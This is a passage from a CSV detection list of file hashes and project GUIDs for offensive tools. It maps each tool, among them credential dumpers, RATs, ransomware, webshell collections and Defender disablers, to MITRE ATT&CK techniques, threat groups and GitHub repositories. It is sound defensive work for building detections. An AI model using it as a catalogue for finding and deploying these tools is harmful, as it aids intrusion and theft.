"*7be59deb0b1db3b7898139b7f5575ddedd5ed91e964bdb54546bb3bfd6d3eec1*",".{0,1000}7be59deb0b1db3b7898139b7f5575ddedd5ed91e964bdb54546bb3bfd6d3eec1.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29570" "*7be8dfa044e5b3d190e18fba93418c2d30648b35f9aadc3702a11d048b430d71*",".{0,1000}7be8dfa044e5b3d190e18fba93418c2d30648b35f9aadc3702a11d048b430d71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29571" "*7be934c8e901153ea188a5003414ea2d18a47f8f404792a27448e383fc1a5e28*",".{0,1000}7be934c8e901153ea188a5003414ea2d18a47f8f404792a27448e383fc1a5e28.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29572" "*7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b*",".{0,1000}7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","29573" "*7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa*",".{0,1000}7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","29574" "*7bf1a774419d2b7c7dc3d1d61802494c5b6c1a2a9e0512f2a9993c73f41aeaa1*",".{0,1000}7bf1a774419d2b7c7dc3d1d61802494c5b6c1a2a9e0512f2a9993c73f41aeaa1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29575" "*7bf6b6be-a29f-440a-9962-9fabc5d9665a*",".{0,1000}7bf6b6be\-a29f\-440a\-9962\-9fabc5d9665a.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#GUIDproject","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","29577" "*7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022*",".{0,1000}7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29578" "*7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1*",".{0,1000}7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29579" "*7c1d37a17c8b71a2c58e28251bef0baee7b06757764e5979daf7f1185a9696bb*",".{0,1000}7c1d37a17c8b71a2c58e28251bef0baee7b06757764e5979daf7f1185a9696bb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29581" "*7c20345b30b2db97967812965d5a90ba34424cc481d073914d016e2541494f6f*",".{0,1000}7c20345b30b2db97967812965d5a90ba34424cc481d073914d016e2541494f6f.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","29582" "*7c2c0aec-7b9d-4104-99fa-1844d609452c*",".{0,1000}7c2c0aec\-7b9d\-4104\-99fa\-1844d609452c.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#GUIDproject","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","29585" "*7c37604dd86dc2ce14b352c8df0c4230ab3a1887ef73349806b0e7c15025843c*",".{0,1000}7c37604dd86dc2ce14b352c8df0c4230ab3a1887ef73349806b0e7c15025843c.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","#filehash","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","29586" "*7c3c428effecb086e266482a9d18a622aa939ae380be734ab844c38aedc19a5d*",".{0,1000}7c3c428effecb086e266482a9d18a622aa939ae380be734ab844c38aedc19a5d.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","29587" "*7c3c699693507772f6c20be4e9caa31b74b7bf87bf6b7db9f3293c51de05b801*",".{0,1000}7c3c699693507772f6c20be4e9caa31b74b7bf87bf6b7db9f3293c51de05b801.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29588" "*7C3D26E5-0A61-479A-AFAC-D34F2659F301*",".{0,1000}7C3D26E5\-0A61\-479A\-AFAC\-D34F2659F301.{0,1000}","offensive_tool_keyword","Powerpick","allowing the 
execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#GUIDproject","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","29589" "*7c40428f6a5c9b8bc70387d5c9dfa173a47095f89e517b3fc0595807477b56f4*",".{0,1000}7c40428f6a5c9b8bc70387d5c9dfa173a47095f89e517b3fc0595807477b56f4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29591" "*7c43dca2c565e2c362c1085358213802a55f05d911560b689bbd138225e8d6d7*",".{0,1000}7c43dca2c565e2c362c1085358213802a55f05d911560b689bbd138225e8d6d7.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","29593" "*7c45771cd7dab73930cec33123a0073e96f50ec035e5b4e3774d3b188441b481*",".{0,1000}7c45771cd7dab73930cec33123a0073e96f50ec035e5b4e3774d3b188441b481.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29594" "*7c4650646cf661efd5ad7dc45f6237f6aa0cc28e81163ce1e3a7b86841cbd5f8*",".{0,1000}7c4650646cf661efd5ad7dc45f6237f6aa0cc28e81163ce1e3a7b86841cbd5f8.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free 
and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","29595" "*7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6*",".{0,1000}7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29596" "*7c564e21d505b73cfb26be1cc3fefc72a78787e8ff4dddca0d1fd7923e00add8*",".{0,1000}7c564e21d505b73cfb26be1cc3fefc72a78787e8ff4dddca0d1fd7923e00add8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29599" "*7C5C471B-9630-4DF5-A099-405D86553ECA*",".{0,1000}7C5C471B\-9630\-4DF5\-A099\-405D86553ECA.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#GUIDproject","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","29602" 
"*7c6036ed3f0b67af1cc73941987fbe7884789264691d05604e8a5e8b3cd9b5a1*",".{0,1000}7c6036ed3f0b67af1cc73941987fbe7884789264691d05604e8a5e8b3cd9b5a1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29603" "*7c60f8bb63b494964ea495a4ccdfd5a5370c2b9317f26c8bfa1d4070cc4cebe4*",".{0,1000}7c60f8bb63b494964ea495a4ccdfd5a5370c2b9317f26c8bfa1d4070cc4cebe4.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29604" "*7C6D1CCD-D4DF-426A-B5D6-A6B5F13D0091*",".{0,1000}7C6D1CCD\-D4DF\-426A\-B5D6\-A6B5F13D0091.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","29607" "*7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b*",".{0,1000}7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","29608" "*7c7803b24a7fa83c44e34499b0cc7dd9098e8d636e52c20296b0751465c3f6c3*",".{0,1000}7c7803b24a7fa83c44e34499b0cc7dd9098e8d636e52c20296b0751465c3f6c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29611" "*7c7b8879594486833d1c8baf05f6377ab7cb7a9b3a285ea159f25760b2d4070c*",".{0,1000}7c7b8879594486833d1c8baf05f6377ab7cb7a9b3a285ea159f25760b2d4070c.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash 
#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","29612" "*7c7f9dd4b51947a2dddd547688a493b04342058c2513e896cc70a7961cab34e7*",".{0,1000}7c7f9dd4b51947a2dddd547688a493b04342058c2513e896cc70a7961cab34e7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29613" "*7c81d08540dd014938278a2f8edf99b75dfb677804d8806a67c1fdb70c49efd6*",".{0,1000}7c81d08540dd014938278a2f8edf99b75dfb677804d8806a67c1fdb70c49efd6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29614" "*7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109*",".{0,1000}7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","#filehash","N/A","6","","N/A","","","","29617" "*7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6*",".{0,1000}7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - 
T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#filehash","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","29618" "*7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e*",".{0,1000}7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29619" "*7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed*",".{0,1000}7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","29620" "*7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed*",".{0,1000}7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29621" "*7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0*",".{0,1000}7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - 
TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29622" "*7ca893ad65bcafd58e9e676559b97af9386b184af8127e0c9531660d76ec6ed6*",".{0,1000}7ca893ad65bcafd58e9e676559b97af9386b184af8127e0c9531660d76ec6ed6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29627" "*7cabf5918c2f097e102d28085a8171e98832c150aa10ddbcd1d05e8030f184ef*",".{0,1000}7cabf5918c2f097e102d28085a8171e98832c150aa10ddbcd1d05e8030f184ef.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","29628" "*7cac4f61fe27bdb744f64ae81d3ff0611a42bb814ae589dacedb0d29c7ccdb93*",".{0,1000}7cac4f61fe27bdb744f64ae81d3ff0611a42bb814ae589dacedb0d29c7ccdb93.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","29629" 
"*7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a*",".{0,1000}7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29630" "*7cc0f7c80a3b90b1fed9a972ec241328cbc47edd1eede88bcf24933cc55c0e12*",".{0,1000}7cc0f7c80a3b90b1fed9a972ec241328cbc47edd1eede88bcf24933cc55c0e12.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","29633" "*7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e*",".{0,1000}7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","29634" "*7cc31e4385fd3a21a506705a76c7e505730dba0bffeaeac42dc6796d8c2334d8*",".{0,1000}7cc31e4385fd3a21a506705a76c7e505730dba0bffeaeac42dc6796d8c2334d8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29635" "*7cc7696ab1b2119884eba04da27831f698b793947b6df25a44b0064ccff20ec2*",".{0,1000}7cc7696ab1b2119884eba04da27831f698b793947b6df25a44b0064ccff20ec2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29636" "*7cce8a658252ae3fd74663ac28d94bec3430da75a3b1c3968451dc4a82c08754*",".{0,1000}7cce8a658252ae3fd74663ac28d94bec3430da75a3b1c3968451dc4a82c08754.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29637" "*7cd037fe5ef0d4531cb934b39570014718d2a60c01ab7a8cc74f466b6d0db417*",".{0,1000}7cd037fe5ef0d4531cb934b39570014718d2a60c01ab7a8cc74f466b6d0db417.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29638" 
